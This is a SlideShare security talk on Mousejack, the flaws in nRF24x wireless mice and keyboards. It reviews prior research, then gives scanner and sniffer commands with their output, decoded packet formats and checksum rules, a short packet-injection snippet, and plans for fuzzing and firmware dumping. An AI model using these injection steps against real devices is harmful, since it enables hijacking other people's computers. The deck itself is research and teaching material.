SlideShare a Scribd company logo

Just Mouse Jack Init

A
antitree

This document summarizes research into vulnerabilities in wireless keyboards and mice that use nRF24x chipsets. It describes how "Mousejack" attacks allow injecting mouse events or tracking mouse movement on vulnerable devices. It then provides steps to scan for, sniff traffic from, and send packets to affected devices to potentially control or exploit them. Finally, it discusses analyzing the nRF24 SDK to better understand the communication protocols and find other vulnerabilities.

Technology
1 of 28
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Just (Mouse)jackin’ It Exploring Mousejack & other nRF24x adventures Part 1: Research & Review of Prior Work
Mousejack ... tl;dr ● https://www.bastille.net/technical-details ● Lots of wireless keyboards and mice nRF24x chipsets ● Mice – unencrypted. – Inject mouse events. ● Blind, open-loop on-screen keyboard navigation anyone? – Can we glean info from tracking mouse movement? ● Keyboards – encrypted… but... – Some receivers accept unencrypted keystroke messages… – … from mice with identity crises ● Forced pairing – Because convenience?
Vendor Responses o_O
Vendor Responses “Dell has been working with Bastille Research on their latest findings regarding the vulnerabilities identified in Wireless Keyboard Mouse bundle KM632 & KM714. Customer security is a top concern and priority for Dell and we will work with our customers directly to resolve potential vulnerabilities like this. If you are using the affected models, or question whether you are using an affected model, Dell recommends that you reach out to our Technical support contacts specific to your country as listed here. Dell Technical Support will assist the customer in addressing the vulnerability, including identifying a suitable Dell replacement if appropriate. In the meantime, customers can largely contain this vulnerability by activating the Operating System’s lock screen when not using the system. Dell would like to thank ‘Bastille Research’ and those in the security community whose efforts help us protect customers through coordinated vulnerability disclosure.” February 23rd, 2016.
Teach Me How to Dougie ● https://www.bitcraze.io/crazyradio-pa ● https://github.com/RFStorm/mousejack – nRF24LU1 firmware – Sniffing & Enumeration scripts – PoC Exploit code is not published ● Speculation: Ethical or legal dilemma for the researchers? ● Plenty of information in advisory and prior work slides – We’re big kids, we can figure things out ourselves, right? :)
Teach Me How to Dougie ● Step 1: Scan for devices $ ./nrf24-scanner -l [2016-06-03 01:22:28.768] 62 0 EA:EA:9C:34:07 [2016-06-03 01:22:38.107] 71 10 EA:EA:9C:34:07 00:C2:00:00:ED:CF:FF:00:00:83 [2016-06-03 01:22:38.123] 71 10 EA:EA:9C:34:07 00:C2:00:00:EB:DF:FF:00:00:75 [2016-06-03 01:22:38.148] 71 0 EA:EA:9C:34:07 [2016-06-03 01:22:38.179] 71 0 EA:EA:9C:34:07 [2016-06-03 01:22:46.561] 71 0 EA:EA:9C:34:07 [2016-06-03 01:22:46.569] 71 10 EA:EA:9C:34:07 00:C2:00:00:03:00:00:00:00:3B [2016-06-03 01:22:54.529] 66 0 EA:EA:9C:34:07 [2016-06-03 01:23:02.646] 62 0 EA:EA:9C:34:07 [2016-06-03 01:23:02.662] 62 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:23:11.084] 62 0 EA:EA:9C:34:07 [2016-06-03 01:23:11.090] 62 10 EA:EA:9C:34:07 00:C2:00:00:FE:1F:00:00:00:21 [2016-06-03 01:23:11.137] 62 0 EA:EA:9C:34:07 [2016-06-03 01:23:11.145] 62 10 EA:EA:9C:34:07 00:C2:00:00:FC:4F:00:00:00:F3
Teach Me How to Dougie ● Step 2: Sniff traffic $ ./nrf24-sniffer.py -l -a EA:EA:9C:34:07 [2016-06-03 01:24:38.249] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.306] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:F0:FF:00:00:4E [2016-06-03 01:24:38.313] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:E0:FF:00:00:5E [2016-06-03 01:24:38.321] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:E0:FF:00:00:5E [2016-06-03 01:24:38.327] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:E0:FF:00:00:64 [2016-06-03 01:24:38.335] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:00:00:00:00:3D [2016-06-03 01:24:38.343] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:F0:FF:00:00:4F [2016-06-03 01:24:38.351] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:F0:FF:00:00:54 [2016-06-03 01:24:38.452] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.454] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.554] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.656] 71 10 EA:EA:9C:34:07 00:C2:01:00:00:00:00:00:00:3D [2016-06-03 01:24:38.664] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:00:00:00:00:43 [2016-06-03 01:24:38.672] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.766] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.773] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:00:00:00:00:3E [2016-06-03 01:24:38.781] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:00:00:00:00:43 [2016-06-03 01:24:38.883] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
Teach Me How to Dougie ● Step 2a: Decode… – Active heartbeat: 00:40:00:6E:52 – Active → Idle: 00:4F:00:04:B0:F0:FF:00:00:0E – Idle heartbeat: 00:40:04:B0:0C – Left press: 00:C2:01:00:00:00:00:00:00:3D – Right press: 00:C2:02:00:00:00:00:00:00:3C – Middle press: 00:C2:04:00:00:00:00:00:00:3A – Release: 00:C2:00:00:00:00:00:00:00:3E – Movement: 00:C2:00:00:FE:AF:FF:00:00:92 00:C2:00:00:FF:6F:00:00:00:D0 00:C2:00:00:EE:0F:00:00:00:41 00:C2:00:00:07:E0:FF:00:00:58
Teach Me How to Dougie ● Step 2a: Decode… – Last byte is checksum ● Checksum = -(sum(payload)) – That’s a two’s complement negation, not bitwise – Byte two is button press mask: ● [0]: Left button ● [1]: Right button ● [2]: Scroll wheel button ● [3]: Side button (back) ● [4]: Side button (forward) ● [5]: Thumb button – Press sets bit, release clears it
Teach Me How to Dougie ● Step 2a: Decode… – Relative movement in bytes 4 through 6. ● Two’s complement, 12-bit value. ● X = sign_extend([4] | (([5] & 0x0f) << 8)) ● Y = sign_extend(([5] & 0xf0 >> 4) | [6] << 4)
Teach Me How to Dougie ● Demo: – Decode packets piped from nrf24-sniffer.py – Animate/plot mouse movement and button press locations using Turtle [1]. (Live or pre-recorded) [1] https://docs.python.org/2/library/turtle.html
Teach Me How to Dougie ● Step 2b: – Generate or replay packets as needed to drive your coworkers insane. # Put the radio in sniffer mode (ESB w/o auto ACKs) common.radio.enter_sniffer_mode(address) common.radio.set_channel(common.channels[0]) common.radio.transmit_payload(payload)
Teach Me How to Dougie ● Step 3: Probe “network” - Who else is home? $ ./nrf24-network-mapper.py -l -a EA:EA:9C:34:07 [2016-06-03 02:06:06.399] Trying address EA:EA:9C:34:00 [2016-06-03 02:06:06.510] Successful ping of EA:EA:9C:34:00 on channel 17 [2016-06-03 02:06:06.612] Successful ping of EA:EA:9C:34:00 on channel 32 [2016-06-03 02:06:06.966] Trying address EA:EA:9C:34:01 [2016-06-03 02:06:07.539] Trying address EA:EA:9C:34:02 [2016-06-03 02:06:07.754] Successful ping of EA:EA:9C:34:02 on channel 32 [2016-06-03 02:06:08.107] Trying address EA:EA:9C:34:03 [2016-06-03 02:06:08.677] Trying address EA:EA:9C:34:04 [2016-06-03 02:06:09.250] Trying address EA:EA:9C:34:05 [2016-06-03 02:06:09.823] Trying address EA:EA:9C:34:06 [2016-06-03 02:06:10.395] Trying address EA:EA:9C:34:07 [2016-06-03 02:06:10.485] Successful ping of EA:EA:9C:34:07 on channel 14 [2016-06-03 02:06:10.967] Trying address EA:EA:9C:34:08 [2016-06-03 02:06:11.540] Trying address EA:EA:9C:34:09 [2016-06-03 02:06:12.111] Trying address EA:EA:9C:34:0A
Teach Me How to Dougie ● Step 4: Go reverse engineer and exploit the target device(s)
A Mouse ● Who cares? Pointless to bother with? – Subtle jiggler – keep those nasty screensavers off – Blind, open loop attacks possible? – Modified firmware: Surreptitious comms & data exfiltration?
A Keyboard ● -EAGAIN – Have not reproduced keystroke injection yet – Currently distracted by nRF24 datasheets & SDK… – TODO: fuzzing strategy presented in the advisory: ● Monitor EV_KEY events from /dev/inputX node via evtest ● TX payload, check for event(s), verify successes, rinse and repeat SPI programming interface
“Old news, why bother?” ● Some vendors are releasing patches – What subset of users will bother to apply patch? ● Are there more opportunities for shenanigans? – What does the nRF24 SDK provide? ● i.e., what code are we likely to find that’s been copied wholesale into firmware? – What other devices can I find using these parts?
nRF24L01+ ● Low cost, single-chip 2.4 GHz transceiver ● GFSK modulation, 1 or 2 Mbps ● “Enhanced ShockBurst” – Automatic packet handling (e.g., validation, ACK, retries) – Built-in FIFOs – “Multiceiver” (6 separate RX data pipes) ● SPI interface for control and data ● 2011: Promiscuous mode hack to sniff keyboard [1] – <3 Travis Goodspeed [1] https://travisgoodspeed.blogspot.com/2011/02/promiscuity-is-nrf24l01s-duty.html
nRF24LU1+ ● Single chip solution: – nRF24L01+ transceiver – 8051 microcontroller ● USB interface ● Flash memory – AES co-processor ● Mention of “True RNG?” Note: nRF24LE1+ is similar, minus USB and full AES co-processor (Galois multipliers only?)
Can we abuse automagic features? ● Lots of nice features to ensure devs only see “valid” packets. – What assumptions will developers make that we can prove incorrect? – Can we control packet drop? – Can we bend RX state machines to our whim? ● Prior work on “packet in packet” attacks relevant?
Can we abuse automagic features? ● Spoof messages with PID + n, PID + (n+1)
Possible to dump firmware? Only if protections weren’t enabled.
Possible to dump firmware? Only if protections weren’t enabled. :(
nRF24 SDK ● Provides “Gazelle” Link Layer & examples – Star network with 6 nodes (Host & device roles) – Frequency Hopping – AES encryption – Pairing example: I wonder if any devs said... “This pairing example works out of the box. SHIPPIT!”
nRF24 SDK ● Provides AES encryption examples – Supports: ● ECB, CBC, CFB, OFB, CTR ● RNG passes “thermal noise” through “digital corrector” to yield 8-bit readout. – I’ll get back to you with FIPS 140-1 test results...
nRF24 SDK: AES Lib
NRF24 SDK: hal_aes
Where’s the Beef? Tune in next time... ● Work with & disassemble SDK examples ● Implement fuzzing scripts ● Try to dump firmware/data from devices – Eliminate or bound fuzzing – Key hunting – Do we see good amounts of SDK code re-use? ● How are the “exercises left to reader” implemented? ● Bring out your keyboards and mice.

More Related Content

PPTX
Docker Security
antitree
 
ODP
State of wifi_2016
antitree
 
ODP
Introduction to ethereum_public
antitree
 
PPTX
Nsa and vpn
antitree
 
PPTX
Salander v bond 2600
antitree
 
PPTX
Reinventing anon email
antitree
 
PPTX
Laverna vs etherpad
antitree
 
ODP
Rtlsdr presentation by alex 1/3/2014
Db Cooper
 
Docker Security
antitree
 
State of wifi_2016
antitree
 
Introduction to ethereum_public
antitree
 
Nsa and vpn
antitree
 
Salander v bond 2600
antitree
 
Reinventing anon email
antitree
 
Laverna vs etherpad
antitree
 
Rtlsdr presentation by alex 1/3/2014
Db Cooper
 

Viewers also liked (8)

ODP
2600 av evasion_deuce
Db Cooper
 
PDF
A brief history of teledildonics
Db Cooper
 
PPTX
Meek and domain fronting public
antitree
 
PPTX
Image based automation
antitree
 
PPTX
How [not] to throw a b sides
antitree
 
PPTX
28c3 in 15
antitree
 
PPTX
0x20 hack
antitree
 
PDF
Android Hacking
antitree
 
2600 av evasion_deuce
Db Cooper
 
A brief history of teledildonics
Db Cooper
 
Meek and domain fronting public
antitree
 
Image based automation
antitree
 
How [not] to throw a b sides
antitree
 
28c3 in 15
antitree
 
0x20 hack
antitree
 
Android Hacking
antitree
 
Ad

Similar to Just Mouse Jack Init (20)

PDF
Duplicates everywhere (Kiev)
Alexey Grigorev
 
PDF
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON
 
PDF
44 con slides
geeksec80
 
PDF
44 con slides (1)
geeksec80
 
PDF
Multiplayer Networking Game
Tanmay Krishna
 
PDF
GameProgramming for college students DMAD
ChristinaTrinidad
 
DOCX
Discussion RubricPage 1 of 8 1. I
LyndonPelletier761
 
PDF
Debugging Complex Systems - Erlang Factory SF 2015
lpgauth
 
PDF
One library for all Java encryption
Dan Cvrcek
 
PDF
Ardx eg-spar-web-rev10
stemplar
 
PDF
Ardx experimenters-guide-web
Jhonny Wladimir Peñaloza Cabello
 
PPTX
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
PROIDEA
 
PDF
Duplicates everywhere (Berlin)
Alexey Grigorev
 
PDF
Because you can’t fix what you don’t know is broken...
Marcel Bruch
 
PDF
Nsd, il tuo compagno di viaggio quando Domino va in crash
Fabio Pignatti
 
PDF
Progressive transpilation and the road to ES2015 in production
Jacques Favreau
 
PPTX
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Jakub Kałużny
 
PDF
CPU vulnerabilities - where are we now?
DefCamp
 
PDF
Opensource Rapidfire X360 Project2
guestf6f4e8
 
PPTX
Country domination - Causing chaos and wrecking havoc
Tiago Henriques
 
Duplicates everywhere (Kiev)
Alexey Grigorev
 
44CON 2013 - Browser bug hunting - Memoirs of a last man standing - Atte Kett...
44CON
 
44 con slides
geeksec80
 
44 con slides (1)
geeksec80
 
Multiplayer Networking Game
Tanmay Krishna
 
GameProgramming for college students DMAD
ChristinaTrinidad
 
Discussion RubricPage 1 of 8 1. I
LyndonPelletier761
 
Debugging Complex Systems - Erlang Factory SF 2015
lpgauth
 
One library for all Java encryption
Dan Cvrcek
 
Ardx eg-spar-web-rev10
stemplar
 
Ardx experimenters-guide-web
Jhonny Wladimir Peñaloza Cabello
 
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocols
PROIDEA
 
Duplicates everywhere (Berlin)
Alexey Grigorev
 
Because you can’t fix what you don’t know is broken...
Marcel Bruch
 
Nsd, il tuo compagno di viaggio quando Domino va in crash
Fabio Pignatti
 
Progressive transpilation and the road to ES2015 in production
Jacques Favreau
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Jakub Kałużny
 
CPU vulnerabilities - where are we now?
DefCamp
 
Opensource Rapidfire X360 Project2
guestf6f4e8
 
Country domination - Causing chaos and wrecking havoc
Tiago Henriques
 
Ad

More from antitree (12)

ODP
Hardening ssh configurations
antitree
 
PPTX
Salander v bond b sides detroit final v3
antitree
 
PPTX
Pentesting embedded
antitree
 
PPTX
Tor
antitree
 
PPTX
Corporate Intelligence: Bridging the security and intelligence community
antitree
 
PPTX
Lock picking barcamp
antitree
 
PPTX
Lock picking 2600
antitree
 
PPTX
Anti tree firesheep
antitree
 
PPTX
Hackerspaces
antitree
 
PDF
Intro to IPv6 by Ben Woodruff
antitree
 
PPTX
Anonymity Systems: Tor
antitree
 
PPTX
Dll hijacking
antitree
 
Hardening ssh configurations
antitree
 
Salander v bond b sides detroit final v3
antitree
 
Pentesting embedded
antitree
 
Tor
antitree
 
Corporate Intelligence: Bridging the security and intelligence community
antitree
 
Lock picking barcamp
antitree
 
Lock picking 2600
antitree
 
Anti tree firesheep
antitree
 
Hackerspaces
antitree
 
Intro to IPv6 by Ben Woodruff
antitree
 
Anonymity Systems: Tor
antitree
 
Dll hijacking
antitree
 

Recently uploaded (20)

PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
DOCX
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
Modernizing your data center with Dell and AMD
Principled Technologies
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
The AUB Centre for AI in Media Proposal.docx
GAONE9
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
Encapsulation theory and applications.pdf
gurumoop
 
A Presentation on Artificial Intelligence
memembruh336
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Modernizing your data center with Dell and AMD
Principled Technologies
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 

Just Mouse Jack Init

  • 1. Just (Mouse)jackin’ It Exploring Mousejack & other nRF24x adventures Part 1: Research & Review of Prior Work
  • 2. Mousejack ... tl;dr ● https://www.bastille.net/technical-details ● Lots of wireless keyboards and mice nRF24x chipsets ● Mice – unencrypted. – Inject mouse events. ● Blind, open-loop on-screen keyboard navigation anyone? – Can we glean info from tracking mouse movement? ● Keyboards – encrypted… but... – Some receivers accept unencrypted keystroke messages… – … from mice with identity crises ● Forced pairing – Because convenience?
  • 4. Vendor Responses “Dell has been working with Bastille Research on their latest findings regarding the vulnerabilities identified in Wireless Keyboard Mouse bundle KM632 & KM714. Customer security is a top concern and priority for Dell and we will work with our customers directly to resolve potential vulnerabilities like this. If you are using the affected models, or question whether you are using an affected model, Dell recommends that you reach out to our Technical support contacts specific to your country as listed here. Dell Technical Support will assist the customer in addressing the vulnerability, including identifying a suitable Dell replacement if appropriate. In the meantime, customers can largely contain this vulnerability by activating the Operating System’s lock screen when not using the system. Dell would like to thank ‘Bastille Research’ and those in the security community whose efforts help us protect customers through coordinated vulnerability disclosure.” February 23rd, 2016.
  • 5. Teach Me How to Dougie ● https://www.bitcraze.io/crazyradio-pa ● https://github.com/RFStorm/mousejack – nRF24LU1 firmware – Sniffing & Enumeration scripts – PoC Exploit code is not published ● Speculation: Ethical or legal dilemma for the researchers? ● Plenty of information in advisory and prior work slides – We’re big kids, we can figure things out ourselves, right? :)
  • 6. Teach Me How to Dougie ● Step 1: Scan for devices $ ./nrf24-scanner -l [2016-06-03 01:22:28.768] 62 0 EA:EA:9C:34:07 [2016-06-03 01:22:38.107] 71 10 EA:EA:9C:34:07 00:C2:00:00:ED:CF:FF:00:00:83 [2016-06-03 01:22:38.123] 71 10 EA:EA:9C:34:07 00:C2:00:00:EB:DF:FF:00:00:75 [2016-06-03 01:22:38.148] 71 0 EA:EA:9C:34:07 [2016-06-03 01:22:38.179] 71 0 EA:EA:9C:34:07 [2016-06-03 01:22:46.561] 71 0 EA:EA:9C:34:07 [2016-06-03 01:22:46.569] 71 10 EA:EA:9C:34:07 00:C2:00:00:03:00:00:00:00:3B [2016-06-03 01:22:54.529] 66 0 EA:EA:9C:34:07 [2016-06-03 01:23:02.646] 62 0 EA:EA:9C:34:07 [2016-06-03 01:23:02.662] 62 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:23:11.084] 62 0 EA:EA:9C:34:07 [2016-06-03 01:23:11.090] 62 10 EA:EA:9C:34:07 00:C2:00:00:FE:1F:00:00:00:21 [2016-06-03 01:23:11.137] 62 0 EA:EA:9C:34:07 [2016-06-03 01:23:11.145] 62 10 EA:EA:9C:34:07 00:C2:00:00:FC:4F:00:00:00:F3
  • 7. Teach Me How to Dougie ● Step 2: Sniff traffic $ ./nrf24-sniffer.py -l -a EA:EA:9C:34:07 [2016-06-03 01:24:38.249] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.306] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:F0:FF:00:00:4E [2016-06-03 01:24:38.313] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:E0:FF:00:00:5E [2016-06-03 01:24:38.321] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:E0:FF:00:00:5E [2016-06-03 01:24:38.327] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:E0:FF:00:00:64 [2016-06-03 01:24:38.335] 71 10 EA:EA:9C:34:07 00:C2:00:00:01:00:00:00:00:3D [2016-06-03 01:24:38.343] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:F0:FF:00:00:4F [2016-06-03 01:24:38.351] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:F0:FF:00:00:54 [2016-06-03 01:24:38.452] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.454] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.554] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.656] 71 10 EA:EA:9C:34:07 00:C2:01:00:00:00:00:00:00:3D [2016-06-03 01:24:38.664] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:00:00:00:00:43 [2016-06-03 01:24:38.672] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.766] 71 5 EA:EA:9C:34:07 00:40:00:6E:52 [2016-06-03 01:24:38.773] 71 10 EA:EA:9C:34:07 00:C2:00:00:00:00:00:00:00:3E [2016-06-03 01:24:38.781] 71 10 EA:EA:9C:34:07 00:4F:00:00:6E:00:00:00:00:43 [2016-06-03 01:24:38.883] 71 5 EA:EA:9C:34:07 00:40:00:6E:52
  • 8. Teach Me How to Dougie ● Step 2a: Decode… – Active heartbeat: 00:40:00:6E:52 – Active → Idle: 00:4F:00:04:B0:F0:FF:00:00:0E – Idle heartbeat: 00:40:04:B0:0C – Left press: 00:C2:01:00:00:00:00:00:00:3D – Right press: 00:C2:02:00:00:00:00:00:00:3C – Middle press: 00:C2:04:00:00:00:00:00:00:3A – Release: 00:C2:00:00:00:00:00:00:00:3E – Movement: 00:C2:00:00:FE:AF:FF:00:00:92 00:C2:00:00:FF:6F:00:00:00:D0 00:C2:00:00:EE:0F:00:00:00:41 00:C2:00:00:07:E0:FF:00:00:58
  • 9. Teach Me How to Dougie ● Step 2a: Decode… – Last byte is checksum ● Checksum = -(sum(payload)) – That’s a two’s complement negation, not bitwise – Byte two is button press mask: ● [0]: Left button ● [1]: Right button ● [2]: Scroll wheel button ● [3]: Side button (back) ● [4]: Side button (forward) ● [5]: Thumb button – Press sets bit, release clears it
  • 10. Teach Me How to Dougie ● Step 2a: Decode… – Relative movement in bytes 4 through 6. ● Two’s complement, 12-bit value. ● X = sign_extend([4] | (([5] & 0x0f) << 8)) ● Y = sign_extend(([5] & 0xf0 >> 4) | [6] << 4)
  • 11. Teach Me How to Dougie ● Demo: – Decode packets piped from nrf24-sniffer.py – Animate/plot mouse movement and button press locations using Turtle [1]. (Live or pre-recorded) [1] https://docs.python.org/2/library/turtle.html
  • 12. Teach Me How to Dougie ● Step 2b: – Generate or replay packets as needed to drive your coworkers insane. # Put the radio in sniffer mode (ESB w/o auto ACKs) common.radio.enter_sniffer_mode(address) common.radio.set_channel(common.channels[0]) common.radio.transmit_payload(payload)
  • 13. Teach Me How to Dougie ● Step 3: Probe “network” - Who else is home? $ ./nrf24-network-mapper.py -l -a EA:EA:9C:34:07 [2016-06-03 02:06:06.399] Trying address EA:EA:9C:34:00 [2016-06-03 02:06:06.510] Successful ping of EA:EA:9C:34:00 on channel 17 [2016-06-03 02:06:06.612] Successful ping of EA:EA:9C:34:00 on channel 32 [2016-06-03 02:06:06.966] Trying address EA:EA:9C:34:01 [2016-06-03 02:06:07.539] Trying address EA:EA:9C:34:02 [2016-06-03 02:06:07.754] Successful ping of EA:EA:9C:34:02 on channel 32 [2016-06-03 02:06:08.107] Trying address EA:EA:9C:34:03 [2016-06-03 02:06:08.677] Trying address EA:EA:9C:34:04 [2016-06-03 02:06:09.250] Trying address EA:EA:9C:34:05 [2016-06-03 02:06:09.823] Trying address EA:EA:9C:34:06 [2016-06-03 02:06:10.395] Trying address EA:EA:9C:34:07 [2016-06-03 02:06:10.485] Successful ping of EA:EA:9C:34:07 on channel 14 [2016-06-03 02:06:10.967] Trying address EA:EA:9C:34:08 [2016-06-03 02:06:11.540] Trying address EA:EA:9C:34:09 [2016-06-03 02:06:12.111] Trying address EA:EA:9C:34:0A
  • 14. Teach Me How to Dougie ● Step 4: Go reverse engineer and exploit the target device(s)
  • 15. A Mouse ● Who cares? Pointless to bother with? – Subtle jiggler – keep those nasty screensavers off – Blind, open loop attacks possible? – Modified firmware: Surreptitious comms & data exfiltration?
  • 16. A Keyboard ● -EAGAIN – Have not reproduced keystroke injection yet – Currently distracted by nRF24 datasheets & SDK… – TODO: fuzzing strategy presented in the advisory: ● Monitor EV_KEY events from /dev/inputX node via evtest ● TX payload, check for event(s), verify successes, rinse and repeat SPI programming interface
  • 17. “Old news, why bother?” ● Some vendors are releasing patches – What subset of users will bother to apply patch? ● Are there more opportunities for shenanigans? – What does the nRF24 SDK provide? ● i.e., what code are we likely to find that’s been copied wholesale into firmware? – What other devices can I find using these parts?
  • 18. nRF24L01+ ● Low cost, single-chip 2.4 GHz transceiver ● GFSK modulation, 1 or 2 Mbps ● “Enhanced ShockBurst” – Automatic packet handling (e.g., validation, ACK, retries) – Built-in FIFOs – “Multiceiver” (6 separate RX data pipes) ● SPI interface for control and data ● 2011: Promiscuous mode hack to sniff keyboard [1] – <3 Travis Goodspeed [1] https://travisgoodspeed.blogspot.com/2011/02/promiscuity-is-nrf24l01s-duty.html
  • 19. nRF24LU1+ ● Single chip solution: – nRF24L01+ transceiver – 8051 microcontroller ● USB interface ● Flash memory – AES co-processor ● Mention of “True RNG?” Note: nRF24LE1+ is similar, minus USB and full AES co-processor (Galois multipliers only?)
  • 20. Can we abuse automagic features? ● Lots of nice features to ensure devs only see “valid” packets. – What assumptions will developers make that we can prove incorrect? – Can we control packet drop? – Can we bend RX state machines to our whim? ● Prior work on “packet in packet” attacks relevant?
  • 21. Can we abuse automagic features? ● Spoof messages with PID + n, PID + (n+1)
  • 22. Possible to dump firmware? Only if protections weren’t enabled.
  • 23. Possible to dump firmware? Only if protections weren’t enabled. :(
  • 24. nRF24 SDK ● Provides “Gazelle” Link Layer & examples – Star network with 6 nodes (Host & device roles) – Frequency Hopping – AES encryption – Pairing example: I wonder if any devs said... “This pairing example works out of the box. SHIPPIT!”
  • 25. nRF24 SDK ● Provides AES encryption examples – Supports: ● ECB, CBC, CFB, OFB, CTR ● RNG passes “thermal noise” through “digital corrector” to yield 8-bit readout. – I’ll get back to you with FIPS 140-1 test results...
  • 28. Where’s the Beef? Tune in next time... ● Work with & disassemble SDK examples ● Implement fuzzing scripts ● Try to dump firmware/data from devices – Eliminate or bound fuzzing – Key hunting – Do we see good amounts of SDK code re-use? ● How are the “exercises left to reader” implemented? ● Bring out your keyboards and mice.